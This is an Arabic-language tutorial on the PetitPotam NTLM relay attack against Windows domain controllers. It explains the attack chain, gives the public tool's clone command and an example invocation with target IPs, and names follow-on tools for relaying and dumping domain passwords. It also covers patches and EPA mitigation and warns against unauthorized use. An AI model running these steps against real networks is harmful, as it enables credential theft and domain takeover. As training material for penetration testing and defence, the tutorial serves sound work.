PetitPotam Attack
هجمة متطورة تستغل بروتوكولات ويندوز القديمة لإجبار سيرفر دومين يسلّمك… الـ NTLM Hash بكل طيبة
PetitPotam ما هي
PetitPotam هي هجمة Relay ذكية على بروتوكول قديم في ويندوز اسمه MS-EFSRPC
(المسؤول عن إدارة الملفات المشفّرة)
تستغل فيها خاصية موجودة في سيرفرات Windows Domain Controllers وتخليها تتصل عليك بنفسها (!!!)
وترسل لك شهادة الدخول المشفّرة NTLM hash
ومن هنا، تقدر تكمل بهجمة relay على جهاز ثاني أو تسرق الجلسة بالكامل
: آلية الهجوم ببساطة
تخلي Domain Controller (أو أي جهاز) يرسل طلب NTLM authentication لك
تستقبل الهاش باستخدام أدوات مثل Responder أو Impacket ntlmrelayx
تعيد توجيه الطلب إلى جهاز آخر في الشبكة (مثل File Share أو LDAP)
تستغل الصلاحيات اللي حصلت عليها للدخول أو تنفيذ أوامر
: PetitPotam ماذا تحتاج عشان تجرب
أداة PetitPotam.py (من GitHub)
بيئة Windows Domain (AD lab
أداة Responder أو ntlmrelayx من Impacket
إعداد Listener عندك
اتصال بـ الشبكة الداخلية (Local/ VPN / Lab)
: تحميل الأداة
git clone https://github.com/topotam/PetitPotam.git
cd PetitPotam
: مثال عملي
python3 PetitPotam.py -u ” -p ” -d test.local 192.168.1.100 192.168.1.200
192.168.1.100 → هو الجهاز اللي راح ترسله الـ NTLM
192.168.1.200 → هو السيرفر الضحية (Domain Controller غالبًا)
تشغّل ntlmrelayx قبل الهجمة عشان تلتقط الهاشات وتعيد توجيهها
: أدوات تكمل الشغل معها
Responder → للتقاط NTLMv1/v2
Impacket ntlmrelayx.py → لتنفيذ أوامر بصلاحية
secretsdump.py → لو حصلت على SYSTEM، تقدر تسحب كل الباسووردات من الدومين
: ملاحظات دفاعية
مايكروسوفت أصدرت تحديثات تسكّر ثغرة EFSRPC
لكن بعض الأنظمة القديمة/غير المحدثة لا تزال عرضة
الحل: تفعيل EPA – Extended Protection for Authentication
وإغلاق بروتوكولات SMB القديمة
:⚠️ تنبيه قوي
هذه الهجمة قوية جدًا، ويُمنع استخدامها خارج بيئة اختبارية
تصلح لاختبارات حقيقية ضمن Red Team Engagements
استخدامها ضد شبكات حقيقية بدون إذن = جريمة إلكترونية خطيرة